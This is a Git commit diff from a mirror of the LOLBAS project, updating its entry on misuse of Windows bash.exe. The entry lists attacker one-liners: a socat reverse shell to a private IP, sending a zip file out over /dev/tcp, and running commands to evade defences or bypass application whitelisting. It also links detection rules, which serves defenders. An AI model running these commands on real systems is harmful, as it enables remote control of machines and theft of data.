public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-27 04:32:24 +02:00
Code Issues Projects Releases Wiki Activity

Generalising file paths and urls, see #10 (#422)

Browse Source
This commit is contained in:
Wietze
2025-01-28 11:15:01 +00:00
committed by GitHub
parent e62749f81a
commit a79893e7ad
196 changed files with 555 additions and 758 deletions
Download Patch File Download Diff File Expand all files Collapse all files

16
yml/OSBinaries/Bash.yml
View File

@@ -1,11 +1,11 @@
---
Name: Bash.exe
Description: File used by Windows subsystem for Linux
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe
- Command: bash.exe -c "{CMD}"
Description: Executes executable from bash.exe
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
Privileges: User
@@ -14,7 +14,7 @@ Commands:
Tags:
- Execute: CMD
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
Description: Executes a reverseshell
Description: Executes a reverse shell
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
Privileges: User
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
- Command: bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24'
Description: Exfiltrate data
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
@@ -31,8 +31,8 @@ Commands:
OperatingSystem: Windows 10
Tags:
- Execute: CMD
- Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe
- Command: bash.exe -c "{CMD}"
Description: Executes executable from bash.exe
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
Category: AWL Bypass
Privileges: User
@@ -43,8 +43,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\bash.exe
- Path: C:\Windows\SysWOW64\bash.exe
Code_Sample:
- Code:
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml